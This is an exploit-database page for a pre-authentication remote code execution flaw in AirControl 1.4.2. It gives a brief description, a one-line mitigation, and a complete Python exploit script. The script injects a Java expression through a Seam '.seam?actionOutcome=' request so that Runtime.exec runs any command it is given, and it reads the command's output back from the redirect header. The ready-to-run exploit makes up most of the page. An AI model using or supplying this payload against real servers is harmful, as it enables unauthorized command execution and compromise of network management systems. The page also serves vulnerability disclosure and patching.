AirControl 1.4.2 - PreAuth Remote Code Execution

vendor:

AirControl

by:

0xd0ff9 vs j3ssie

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: AirControl

Affected Version From: AirControl <= 1.4.2

Affected Version To: AirControl <= 1.4.2

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

AirControl 1.4.2 – PreAuth Remote Code Execution

A vulnerability in AirControl <= 1.4.2 allows an attacker to execute arbitrary code on the target system. This is achieved by sending a crafted HTTP request to the vulnerable server, which contains a malicious payload in the form of a Java expression. This expression is then evaluated by the server, allowing the attacker to execute arbitrary code on the target system.

Mitigation:

Upgrade to the latest version of AirControl.

Source

Exploit-DB raw data:

# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution
# Date: 2020-06-03
# Exploit Author: 0xd0ff9 vs j3ssie
# Vendor Homepage: https://www.ui.com/
# Software Link: https://www.ui.com/download/#!utilities
# Version: AirControl <= 1.4.2
# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml

import requests
import re
import urllib
import sys


print """USAGE: python exploit_aircontrol.py [url] [cmd]"""


url = sys.argv[1]
cmd = sys.argv[2]


burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}"
burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False)

Locat =  r.headers["Location"]

res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1)

print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res)